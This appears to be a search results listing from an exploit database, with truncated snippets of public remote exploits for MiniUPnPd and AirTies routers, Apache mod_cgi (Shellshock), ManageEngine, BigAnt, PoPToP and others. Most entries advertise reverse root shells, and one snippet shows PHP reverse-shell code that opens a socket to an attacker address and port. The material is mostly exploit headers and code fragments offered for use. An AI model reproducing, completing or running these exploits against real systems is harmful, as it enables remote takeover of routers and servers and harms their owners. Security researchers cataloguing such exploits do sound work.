1826 matches found
MiniUPnPd 1.0 Stack Overflow
!/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies RT-204v3 CVE : 2013-0230 Exploit gives a reverse shell to...
MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series
MiniUPnPd 1.0 MIPS - Remote Stack Overflow Remote Code Execution for AirTies RT Series !/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture:...
MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS) Exploit
Exploit for multiple platform in category remote exploits !/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies...
MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series
!/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies RT-204v3 CVE : 2013-0230 Exploit gives a reverse shell to...
PHP reverse eval shell
Made to be pushed through an RCE when exec and similar functions are restricted. Uses only fsockopen and eval. Forks if pcntlfork is available. PHP code: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...
Airties-Air5650TT-Remote
Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Twitter: @batuhanburakcin...
Airties Air5650TT - Remote Stack Overflow Exploit
Exploit for multiple platform in category remote exploits !/usr/bin/env python Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Twitter: @batuhanburakcin Web: http://www.bmicrosystems.com import sys import time import string import...
Airties Air5650TT - Remote Stack Overflow
Airties Air5650TT - Remote Stack Overflow !/usr/bin/env python Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Twitter: @batuhanburakcin Web: http://www.bmicrosystems.com import sys import time import string import socket...
Airties Air5650TT - Remote Stack Overflow
!/usr/bin/env python Exploit for the AIRTIES Air5650v3TT Spawns a reverse root shell Author: Batuhan Burakcin Twitter: @batuhanburakcin Web: http://www.bmicrosystems.com import sys import time import string import socket, struct import urllib, urllib2, httplib i...
Exploit Pack - Open Source Security Project for Penetration Testing and Exploit Development
Exploit Pack is an open source GPLv3 security tool; this means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Impact are ready to use as well, but you will require an expensive license to get access to all the...
Sitecom-MD-25x
Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin Version: 2.4.17 and below...
ManageEngine-5.5
The SQL injection is possible on the "Advanced Search"; the input is not validated correctly. To make it even worse, the search can be accessed without any authentication. Security Manager Plus also has to run as root or SYSTEM user, which makes a remote shell with root/SYSTEM privileges...
BigAnt-Server-2.52-SP5-SEH
Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit ASLR + DEP bypass Date: 03/11/2012 Exploit Author: Lorenzo Cantoni Vendor Homepage: http://www.bigantsoft.com/ Version: BigAnt Console 2.52 SP5 Tested on: Windows 7 SP0 x86 Italian - expsrv.dll 6.0.9589 Info: Vulnerability...
Apache mod_cgi - Remote Exploit (Shellshock)
No description provided by source. ! /usr/bin/env python from socket import from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage: print """ Shellshock apache modcgi remote exploit Usage: ./exploit.py var=value Vars: rhost: vict...
Apache mod_cgi Remote Command Execution
! /usr/bin/env python from socket import from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage: print """ Shellshock apache modcgi remote exploit Usage: ./exploit.py var= Vars: rhost: victim host rport: victim port for TCP shell...
Exploit for OS Command Injection in Gnu Bash
BadBash ======= CVE-2014-6271 ShellShock RCE PoC tool =====...
ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure Vulnerability
No description provided by source. Introduction to the PoC : ====================================================================== In this distribution, the management website is a binary file named kerbynet interpreted in cgi-bin directory here : /cdrom/usr/local/apache2/cgi-bin/kerbynet So all...
PHP Charts 1.0 (index.php, type param) - Remote Code Execution
No description provided by source. !/usr/bin/python Original Advisory came from: http://packetstormsecurity.com/files/119582/PHP-Charts-1.0-Code-Execution.html infodox - insecurety.net import requests import random import threading import sys def genpayloadhost, port: Perl Reverse Shell Generator...
Quick Player 1.2 - Unicode Buffer Overflow Exploit
No description provided by source. !/usr/bin/python Vulnerability : Quick Player v1.2 unicode buffer overflow exploit coded by : mrme reference : http://www.exploit-db.com/exploits/10759 corelanc0d3r Tested on : XP SP3 En VirtualBox Greetz to : Corelan Security...
PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit
No description provided by source. / exploit for a recently discovered vulnerability in PoPToP PPTP server under Linux. Versions affected are all prior to 1.1.4-b3 and 1.1.3-20030409. The exploit is capable of bruteforcing the RET address to find our buffer in the stack. Upon a successful run it...